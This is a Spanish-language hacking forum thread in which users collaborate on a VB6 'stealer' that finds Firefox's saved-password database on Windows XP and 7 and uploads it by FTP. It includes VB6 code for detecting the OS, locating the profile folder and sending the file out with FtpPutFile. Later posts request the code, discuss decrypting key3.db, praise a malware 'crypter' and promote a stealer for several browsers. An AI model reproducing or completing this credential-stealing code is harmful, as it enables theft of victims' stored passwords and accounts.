[VB6] FireFox Passwords Stealer - WinXP y ¿Win7?

Iniciado por extreme69, 25 Junio 2010, 21:13 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

extreme69

25 Junio 2010, 21:13 PM Ultima modificación: 26 Junio 2010, 02:09 AM por extreme69
Hice un stealer para passwords de firefox, funciona perfecto, pero sólo funciona en Win XP en español (y digo en español porque no le agregué la ruta del Win XP en inglés aún)

1) La cosa es que quiero hacer que me robe también las contraseñas en Win7 (inglés y español) y en WinXP en inglés pero no sé las rutas del archivo "signons.sqlite" en esos sistemas operativos.

Alguien sería tan amable de decirme en donde se aloja dicho archivo en cada idioma de Win7 y WinXP ? (o por lo menos digan en donde está en su pc y que sistema operativo e idioma tienen).

WinXP Español: C:\Documents and Settings\USUARIO\Datos de programa\Mozilla\Firefox\Profiles\iwlspcot.default\signons.sqlite


2) Por otro lado, ¿sólo se necesita el archivo signons.sqlite?

Porque probé con mi pc la parte del robo del archivo y funciona perfecto, y  probé con el archivo signons.sqlite de un amigo (que me lo pasó amablemente para probar) y también pude ver sus passwords, pero cuando intento hacerlo con otro signons.sqlite de un Win7 no me deja ver las pass :/

Ví también que en Win7 hay un archivo que difiere de tamaño con respecto a WinXP dentro de la misma carpeta "????????.default" que se llama "cert8.db", es el único archivo que difiere del resto  :huh:

Alguien me da alguna ayudita?

Gracias!!!  ;-)


EDIT: ahora se me ocurrió leer el CurrentVersion del registro y según la versión de windows ejecutar X lineas, también lo puedo hacer con el idioma, de todos modos sigo necesitando las rutas de los distintos OS's.


EDIT2: Listo, ya tengo la parte de detectar OS e idioma del OS terminada, ahora sólo me faltaría saber las rutas de cada OS e Idioma.


EDIT3: Ahora lo tengo funcionando en XP (inglés y español) y Win7 en todos los idiomas  ;-). Sigo necesitando el nombre de la carpeta "Datos de programa" en otros idiomas (portugues, alemán, y algún otro) en Windows XP.

Esto parece un monólogo xD


Karcrack

#1
26 Junio 2010, 10:37 AM Ultima modificación: 26 Junio 2010, 10:40 AM por Karcrack
 :rolleyes:
Variable de entorno:
Código [Seleccionar]
http://es.wikipedia.org/wiki/Variable_de_entorno
http://en.wikipedia.org/wiki/Environment_variable

Solucion:
%APPDATA% :D
Código (vb) [Seleccionar]
msgbox Environ("APPDATA")

Saludos ;)

(PGP ID)

extreme69

#2
26 Junio 2010, 19:30 PM
Si, lo sé, el problema era que no sabía como usar el %APPDATA% en la línea que lo necesitaba, también podía usar %HOMEPATH% que es lo que hice en cierta parte del código, quizás me la compliqué demasiado, pero bueno, soy nuevo en VB, tengo 2 semanas de VB, bastante que lo pude hacer desde cero sin usar código de terceros xD

En cierta parte del código usé algo como:

Código [Seleccionar]
    If GetWinVersion = "5,01" And txt_language.Text = "Spanish (Español)." Then
        txt_Comando.Text = "dir /b ""%homepath%\DATOSD~1\Mozilla\Firefox\Profiles\*.*"""
    End If
   
    If GetWinVersion = "5,01" And txt_language.Text <> "Spanish (Español)." Then
        txt_Comando.Text = "dir /b ""%homepath%\AppData\Mozilla\Firefox\Profiles\*.*"""
    End If

    If GetWinVersion = "6,01" Then
        txt_Comando.Text = "dir /b ""%homepath%\AppData\Roaming\Mozilla\Firefox\Profiles\*.*"""
    End If


El problema es que no sabía ponerlo aquí:

Código [Seleccionar]
FtpPutFile hConnection, (txt_discolocal.Text & "\Users\" & txt_UserName.Text & "\AppData\Roaming\Mozilla\Firefox\Profiles\" & txt_resultado.Text & "\signons.sqlite"), "signons.sqlite", FTP_TRANSFER_TYPE_UNKNOWN, 0

Me hubiese evitado conseguir el txt_UserName.Text si hubiese podido usar %APPDATA%, ahora pruebo si lo logro.

Gracias Karcrack, estuve probando tu crypter, está bastante útil.

Le estoy dedicando mucho tiempo a VB a ver si aprendo rápido ^^

Karcrack

#3
27 Junio 2010, 14:08 PM
Te recomiendo que utilices Variables para almacenar la informacion, y no controles, eso es una chapuza :-\

Asi es como lo haria yo :D
Código (vb) [Seleccionar]
    Dim sPath   As String
   
    Call Dir$(Environ$("APPDATA") & "\Mozilla\Firefox\Profiles\*.*", vbDirectory)
    Call Dir$
    sPath = Environ$("APPDATA") & "\Mozilla\Firefox\Profiles\" & Dir$()
    MsgBox sPath

Saludos, y mucha suerte ;)

(PGP ID)

yalosabes

#4
31 Marzo 2011, 22:13 PM
hola =)

Una vez que se haya el archivo key3.db que se hace?

CAR3S?

#5
26 Abril 2011, 21:43 PM
disculpen que reviva.... pero nadie tiene el link?  :rolleyes:

estoy peleando con ese key3.db .... pero la verdad estoy en 0.

jacckker

#6
20 Octubre 2011, 17:25 PM
Podrías compartir el código?
Si aquel que pregunta una vez es tonto una vez y aquel que no pregunta nunca es tonto siempre, yo soy re inteligente!!

jacckker

#7
21 Octubre 2011, 22:08 PM
Se que no es una colaboración lo que voy a hacer, pero creé un tema en el que estoy queriendo desarrollar un stealer para Firefox, Chrome e Internet Explorer.

Si a alguno le interesa, los invito a dar una vuelta: http://foro.elhacker.net/net/desarrollo_de_stealer_en_c-t342540.0.html
Si aquel que pregunta una vez es tonto una vez y aquel que no pregunta nunca es tonto siempre, yo soy re inteligente!!

BlackZeroX

#8
22 Octubre 2011, 00:40 AM Ultima modificación: 22 Octubre 2011, 00:43 AM por BlackZeroX (Astaroth)
.
Si no mal recuerdo. para abrir key3.db nesesitas SQLite... corrijanme si me equivoco.

http://www.scribd.com/fullscreen/52882068

Dulces Lunas!¡.
The Dark Shadow is my passion.

jacckker

#9
24 Noviembre 2011, 19:26 PM
Cita de: BlackZeroX (Astaroth) en 22 Octubre 2011, 00:40 AM
.
Si no mal recuerdo. para abrir key3.db nesesitas SQLite... corrijanme si me equivoco.

http://www.scribd.com/fullscreen/52882068

Dulces Lunas!¡.

Recordas bien, pero los datos estan cifrados en la base de datos
Si aquel que pregunta una vez es tonto una vez y aquel que no pregunta nunca es tonto siempre, yo soy re inteligente!!
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario